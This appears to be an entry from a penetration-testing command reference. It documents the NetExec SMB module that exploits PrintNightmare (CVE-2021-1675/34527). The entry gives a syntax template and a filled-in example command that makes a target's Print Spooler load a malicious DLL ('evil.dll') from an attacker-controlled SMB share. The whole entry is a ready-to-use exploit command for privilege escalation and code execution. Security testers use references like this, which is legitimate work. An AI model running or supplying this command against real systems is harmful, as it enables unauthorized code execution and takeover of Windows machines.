NetExec SMB PrintNightmare

Exploit PrintNightmare (CVE-2021-1675/34527) to load a malicious DLL via the Print Spooler service

Tool
nxc
Category
Privilege Escalation / Local PrivEsc
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb '<ip>' -u '<user>' -p '<password>' -M printnightmare -o DLL='\\<ip>\share\evil.dll'

Examples

nxc smb '192.168.1.100' -u 'user' -p 'password' -M printnightmare -o DLL='\\\\192.168.1.50\\share\\evil.dll'

Tags

nxc smb printnightmare cve-2021-1675 cve-2021-34527 print-spooler privilege-escalation